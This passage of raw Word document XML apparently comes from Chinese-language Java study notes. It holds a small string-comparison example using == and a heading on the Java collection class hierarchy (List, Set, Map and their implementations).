                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t xml:space="preserve">String </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s2</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"a"</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="2A00FF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"bc"</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t>System.</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="0000C0"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>out</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.println(</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s1</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> == </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s2</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>static</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7F0055"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> main(String[] </w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="6A3E3E"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>args</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>test4</w:t>
            </w:r>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRPr="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:kern w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00E546DB" w:rsidRDefault="00E546DB" w:rsidP="00E546DB">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E546DB">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E546DB" w:rsidRPr="005C7D4E" w:rsidRDefault="00E546DB" w:rsidP="005C7D4E">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="290" w:lineRule="atLeast"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005C7D4E" w:rsidRPr="005C7D4E" w:rsidRDefault="005C7D4E" w:rsidP="0024633D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A54AFF" w:rsidRPr="00F41A4C" w:rsidRDefault="000C2DE8" w:rsidP="000A74DD">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00027153" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00027153" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>集合类继承结构</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027153" w:rsidRPr="00F41A4C" w:rsidRDefault="00027153" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027153" w:rsidRPr="00F41A4C" w:rsidRDefault="00027153" w:rsidP="00FF3D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>List</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>LinkedList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ArrayList</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>│└</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>└Stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>└Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="5E5E5E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
